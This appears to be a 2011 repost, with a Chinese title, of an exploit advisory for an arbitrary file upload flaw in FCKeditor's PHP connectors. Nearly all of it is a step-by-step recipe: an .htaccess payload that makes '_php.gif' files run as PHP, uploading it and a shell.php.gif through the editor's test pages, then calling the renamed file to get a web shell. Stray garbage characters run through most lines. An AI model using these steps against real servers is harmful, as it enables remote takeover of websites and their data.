FCKeditor所有php版本Upload上传漏洞
8 Q1 ~7 u- d$ P8 B作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07; O( @) @6 s3 e5 \# s, o
减小字体 增大字体
7 z) D0 M$ f, p. ][+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability# j- v( ]0 U# w! X W( h
[+] Date: 2011
( I# @. P1 e! g- O, {[+] Author : sinesafe.cn
+ d9 E( u' u3 E E7 M6 U5 i[+] Website : WwW.sinesafe.cn$ w3 ^4 k" f3 e! E
———————————————————
* @4 K1 ^1 [8 ~$ v" q1.create a htaccess file:, G9 c0 d7 m; T: ]% R) t4 B
code:6 Q4 H% K( o: {
<FilesMatch “_php.gif”>& @3 Z& e7 s. R1 Q' w& u
SetHandler application/x-httpd-php: r9 C- e8 ?* `* P3 e
</FilesMatch>( M+ ]* _# L2 n0 Q
0 X- f# V' E, {1 `
2.Now upload this htaccess with FCKeditor.
Q- s- |( `9 I* G9 \- d4 o" ^$ c2 t
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html
; R& z o# `* S7 Z% U9 a( h. m3 W
0 M) ^+ P W/ Q: R9 ahttp://www.sinesafe.cn/FCKeditor ... onnectors/test.html1 q0 }3 s: v7 U# T& d
& H9 t8 R! G) ]$ ?1 ~- {———————————————————————————————-
# Q0 o. ~3 P' d, U, `' `3.Now upload shell.php.gif with FCKeditor.& L# O/ w* }) x% ~9 N
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
% W/ B& L( _& l8 G3 i5.http://www.sinesafe.cn/anything/shell_php.gif
% H' Q3 {% N" \ v: ?/ v' r6.Now shell is available from server. | ' } V- d3 A+ V( }3 Z" }& W
+ l1 ]% `, }- [4 x$ l) k
8 d0 W3 _/ k9 [- T( Z1 j
|